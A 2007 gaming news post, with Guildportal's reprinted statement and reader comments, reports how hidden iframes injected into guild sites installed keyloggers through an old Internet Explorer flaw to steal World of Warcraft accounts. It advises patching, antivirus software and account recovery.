Guildportal, keyloggers, and you
by Elizabeth Harper 
Apr 7th 2007 at 2:31PM
In the past week, you may have noticed an increase in complaints about hacked accounts on the forums. Why? Well, the popular guild-hosting website Guildportal was hacked -- hackers added a bit of code exploiting an old Internet Explorer vulnerability (Microsoft had a patch available six months ago) to install a keylogger on visitors' systems. It was a brilliant move by the hackers, who managed to tap into a site visited by a massive number of WoW players -- the perfect place to steal account information. But I can't say it was very good for some of Guildportal's users, who logged on to World of Warcraft to find their characters completely naked next to an unfamiliar mailbox.However, this entire affair was very preventable. First off, Guildportal itself had a vulnerability that allowed hackers to insert the exploit that installed the keylogger. And then in order for the keylogger to be installed, individuals visiting Guildportal had to be running a version of Internet Explorer that was 6 months out of date.
Guildportal has taken steps to prevent this from happening again, by patching their systems and banning traffic from China, where the hack attack originated from. (According to Guildportal's response as reported on the forums and a commenter on Madness and Games identifying himself as Aaron Lewis of Guildportal.) But have you taken steps? In Blizzard's post on the subject, they point out Microsoft Security Bulletin MS06-055, released by Microsoft on September 26th, 2006. You can stop many potential keylogger threats by simply visiting Windows Update to download patches regularly -- or, even easier, enabling Windows' Automatic Update feature. Either option would have resulted in your computer being protected from this vulnerability well before now.
Think your account has been compromised? GM Kaone offers some good instructions on how to rid your computer of keyloggers (it's a lengthy post but very informative) and then points you to their billing support department for account recovery. (Yes, it is important to get rid of the keylogger before having your account restored -- otherwise you'll end up right back where you started!) But be prepared for a wait -- the account recovery process isn't always fast.
See Guildportal's full response to its users after the jump.
Other recent security advisories:
Beware the cursor hack
Keep keyloggers away: New Microsoft hotfix available
More security warnings from Blizzard
Blizzard reminds us to be careful of keyloggers
[Via PlayNoEvil, with thanks to robodex for the forums link]
Via the forums:
Dear GuildPortal Members,
Over the past few days we have been fighting a brute force attack against our servers by multiple (10+) computers that we suspect are located in China. While we have secured the services and the problem is gone, we want to let you know, fully, what exactly happened.
The attacks were successful to an extent, in that they were able to modify content on many sites, injecting code into welcome messages that contained a hidden iframe. This frame would then load script into the user's browser that installed a keylogger.
This did not affect all guilds or all users. The users that were affected were running Internet Explorer on Windows with no virus protection installed.
We have been working very hard with Rackspace to identify the means the attackers used and to nullify their ability to continue, but our top priority was always to reverse the injections as soon as we possibly could. We don't expect or deserve any pity for missing sleep, to be sure, but please believe that we have been doing everything we can to first remove the malicious code from your sites and then remove their ability to do it again. Many times during this, we have brought GuildPortal completely down in order to prevent the spreading of the trojan while we removed the code that loaded it. The process the attackers used to do this was automated -- our ability to counter what they were doing was not.
We believe we have patched up the problem that made what they did possible. However, please, if you use Internet Explorer under Windows, install a virus scanner if you don't already have one. If you don't, odds are overwhelmingly in favor of you already being infected with something.
Blizzard has an excellent write-up on securing your computer here, as well as information on what to do in case your World of Warcraft account has been compromised at this link.
Over the next few days, we are conducting a full security audit of our entire infrastructure, to locate and eradicate any other even remotely possible security risks. We cannot promise a security problem will never happen again -- no more than Microsoft promises their operating systems or browsers will be completely secure and virus-free after a service pack release -- but we will call (and have been calling) on all of the resources we have at our disposal to secure every part of the site, and it is our top priority.
We apologize for any inconvenience and, as always, thank you very much for choosing GuildPortal as your guild's home on the web!
Filed under: Analysis / Opinion, Blizzard
Reader Comments (Page 1 of 1)
Ekrim Apr 7th 2007 4:04PM
Lessons to take away from this:
1) Keep your system patched and up-to-date.
2) Use Firefox.
3) When you wind up naked next to a mailbox, remember, it's because you did something stupid.
Jeff Powell Apr 7th 2007 4:11PM
My heart totally goes out to anyone who had their account hacked and lost their wow possessions. That would no doubt make a person physically ill.
At the same time, in reading this article and what it took in order to be hacked, if you are still using Internet Explorer in this day and age, you simply aren't paying attention. This isn't like some uber-geek in the know kind of thing because it's been written about on literally thousands of sites, major newspapers like the New York Post and the Wall Street Journal and even the United States Department of Homeland Defense explicitly tells people NOT to use this incredibly unsafe browser.
In this day and age you've got numerous free alternatives that are going to get rid of the vast majority of browser based exploits right there. A little called Firefox (getfirefox.com) will get you started on the right path.
After literally abandoning their browser efforts for 5+ years, Microsoft comes back with IE7 which admittedly is a much better browser but you only have to keep your eyes open to see how these exploits works and eventually you see that if you do things just a little differently, you don't have to suffer along with everyone else.
Another obvious thing about this recent exploit (like every single other WoW exploit) is that Mac users are completely immune to the exploit - period.
I worked for Microsoft for years and am a software developer and I should also mention, that for 99% of my daily work, I use a Mac. For me, its the right tool for the job (including WoW) and I just feel terrible for these people getting hacked like that so I just wanted to mention the obvious things you can do protect yourself by simply switching to a (my opinion) far superior browser like Firefox.
Michael Apr 7th 2007 8:04PM
Own a Mac -- case closed.
baloor Apr 7th 2007 8:49PM
Use Firefox is not an answer to every browser exploit. It also has a fair share of it's own.
http://www.informationweek.com/security/showArticle.jhtml;jsessionid=BLIAXLSRKQ2FKQSNDLRSKHSCJUNN2JVN?articleID=198800640
Pointing people to hotfixes is good too, but until a larger portion of the Windows user market purchases a legitimate copy that can pass WGA and install Service Packs and maintain a current patched system, there will always be a large number of vulnerable users.
I spend a fair portion of every working day supporting users who have systems riddled with holes and would rather just reinstall "Uncle Joe's copy from teh intertubes" than fork out some cash and fix it for good.
robodex Apr 7th 2007 9:32PM
"Use Firefox is not an answer to every browser exploit. It also has a fair share of it's own."
You're completely and utterly missing the point. Firefox does have issues of it's own, but the people who do this--install keyloggers on WoW websites--don't target Firefox. At the moment, installing Firefox is the absolute best thing for people to do, as these people do not target it. The fact that there are holes in Firefox is completely irrelevant to this topic; the Chinafarmers don't target it because it's much easier to target people who haven't updated their machines in months. Firefox still has a relatively small marketshare, and until it gets bigger and more exploits are found for it, it is the browser to use if you don't want to get hacked. It's sorta like telling someone who drives a Civic that it'd be useless to buy a different car, because cars are stolen all the time--but the Civic is the most stolen car of them all.
Anyway, this practice is actually pretty rampant; my guild's website was hacked through a hole in our forum software with the same script that targeted unpatched versions of windows. We lost our MT, Main Healer, a mage and an offtank. Just goes to show how ruthless these people can be.
Cylntmoon Apr 10th 2007 1:37PM
I got hacked and Guildportal had nothing to do with it. I had to reload and when i keyed in my account info with Blizzard it got hijacked. Toons naked yes, but Blizz returned all my gear within 24 hours. A call to the billing dept to change account info, virus scan, and when an investigator became available he took 1 hour to research and return my stuff.
Oomfoofoo Apr 9th 2007 6:15PM
I'm shocked to hear of this 1st here. I am a guildportal customer/admin for my guild's site and was never notified of this by guildportal either thru: their web site's homepage, our guild site, or a personal e-mail. One would think they would pull out all the stops to let their customers and visitors know about this.
I'm completely disapointed in them.
Elizabeth Harper Apr 9th 2007 6:35PM
To the best of my knowledge, this didn't impact every site on Guildportal, and the message reprinted above was sent to guild administrator of guilds that were affected by this. So if this didn't impact your guild's site, you might not have heard a word about it.
irishstu Apr 10th 2007 8:57AM
No messages were sent to Guild Administrators - the article reference was in the news list on the left, and pretty easy to miss. GP were very poor in informing people that they had been hit.
Aaron Lewis Apr 18th 2007 1:27PM
By default, whenever a new guild is created, GuildPortal adds the "GuildPortal News" content type to the guild's home page. Much easier to see and keep up to date on service announcements and the like. We know that many people remove that content item as soon as possible though by default it appears beneath the game-specific news that the guild plays, so it's really not that invasive, but it's understandable that people might not want anything but their own content displayed on their home page.
To get around that, we also have a system-wide message that scrolls along the top of the screen, and we had that active for a day, and it contained a link to the news item as well as a warning that anyone running IE on Windows make sure their system is updated. Although, with the ANI exploit, having your system patched is really not the defense it should be.
The technique they used on our end in order to inject the script into welcome messages has been completely secured from being used that way in the future, and since we're a two-person company, I'll admit with no small amount of shame that I simply missed the single configuration change that would have been necessary for their attacks to work in the first place. They spent a long time locating it and tailoring their attack specifically for GuildPortal (like buying the gui1dportal.com and guildporta1.com domains to host their scripts -- replacing L with 1, which is hard to spot in lowercase).
Massive kudos to Blizzard, of course, for working with users to get their items/accounts back. With all seriousness, please please keep your systems both patched and do run a virus scanner. I know Mcafee and Norton both actively blocked these things from running (why IE allows a remote script on a site you're not even visiting to install and run an executable is beyond me), and without those virus scanners many more would have been affected.
We've done our part on securing GuildPortal, and we're also taking a more proactive approach to notifying people of security updates having to do with browser vulnerabilities.
But everyone needs to be aware that GP isn't the only, nor even the first, vehicle that hackers (using this term loosely -- the hacker's creed is extinct) have used to spread these keyloggers. Check out this article and look at page two to see that a number of government health care sites and the Miama Dolphins site all experienced the very same thing, though the attack wasn't as tailored: http://computerworld.com/action/article.do?command=viewArticleBasic&taxonomyName=security&articleId=9016684. My point isn't to make GP look better, especially when the breach used was something that could have been prevented had I known more about Windows Server configuration 6 years ago, but that no matter where you go, you need to be secured, at the desktop level, against these kinds of attacks.